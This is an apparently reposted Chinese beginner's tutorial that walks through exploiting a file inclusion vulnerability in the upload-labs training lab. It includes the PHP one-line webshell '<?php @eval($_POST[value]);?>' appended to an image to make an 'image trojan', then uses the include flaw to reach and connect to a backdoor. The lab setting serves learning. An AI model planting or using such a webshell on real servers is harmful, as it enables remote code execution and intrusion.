网络安全菜鸟学习之漏洞篇——文件包含漏洞

   日期:2020-10-08     浏览:91    评论:0    
核心提示:这篇文章我们来讲一下文件包含漏洞。至此之前我们先来回忆一下上一篇文章讲的漏洞。我们上一篇文章学习了文件上传漏洞。我们说我们要上传一个可执行木马文件到服务器才能进行操作。那么问题来了,我们能不能上传一个非可执行文件进行同样的操作,这就不得不提到我们这篇文章要讲的漏洞。我们先看一个图来理解一下:好,估计大家都有所理解了。那么我们开始做一个实验来进一步学习一下。...

这篇文章我们来讲一下文件包含漏洞。至此之前我们先来回忆一下上一篇文章讲的漏洞。我们上一篇文章学习了文件上传漏洞。我们说我们要上传一个可执行木马文件到服务器才能进行操作。那么问题来了,我们能不能上传一个非可执行文件进行同样的操作,这就不得不提到我们这篇文章要讲的漏洞。
我们先看一个图来理解一下:


好,估计大家都有所理解了。那么我们开始做一个实验来进一步学习一下。(我们用的是upload-labs-master的Pass-14。当然upload-labs-master的版本不同关卡也有一定是同样的,这就需要你自己找一下了)
首先我们需要制作一张图片马。这个图片马的制作很简单,我们只需用EditPlus(或者用记事本)打开一张图片,在最后面加上以下的代码:<?php @eval($_POST[value]);?>(为了方便演示我还在后面加了句:<?php phpinfo();?>
注:这个靶场演示文件包含漏洞有个小bug,就是制作图片马的时候尽量删除一些图片源码再插入一句话木马。当图片源码过长的时候它会报错,并且不执行一句话木马。(我也不太清楚是这个靶场的问题,还是文件包含漏洞本身的问题。我在网上查了很久,根本没人提出这一点。)
图片:

图片源码:
图片源码进行删除和添加后:
保存后:
好,这时我们的图片马就算完成了。我们现在只需要把图片马上传上去,然后利用包含漏洞就行了。(具体过程如下)
1.上传图片马,并复制图片地址:
2.利用include页面存在的包含漏洞进行构造后门地址。
注:1.这里也就提醒了我们,在实战的时候需要先找寻它是否存在包含漏洞。
2.我这里有网站环境的信息是因为我加了句<?php phpinfo();?>

3.用软件连接后门地址(具体的操作我们上一篇文章讲过,这里我就偷个懒,就截个过程图)


至此我们的实验就完成了。
顺便,我们也来演示一下如果图片源码过长的情况(偷个小懒,就截个过程图,大家和之前的对比着看):






(这里就开报错了,后面也就没法了)


(连接不了后门)
好了,至此我们文件包含漏洞也就学会了。
说明:估计很多看官发现最近我写的两篇文章并没有很详细的讲解它们的原理,怀疑我偷懒了。其实,我并没有偷懒。因为我打算的是后面具体讲。像一句话木马的原理,我后面讲蚁剑一类软件的原理的时候会讲到。所以这里没必要讲。而file之外还有一堆同样用法的函数,我后面要把它们放在一起讲。总之,我有自己的计划。
(ps:来一个迟来的国庆节祝福:国庆节快乐!当然老规矩——求各位看官给点评论和关注)

 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服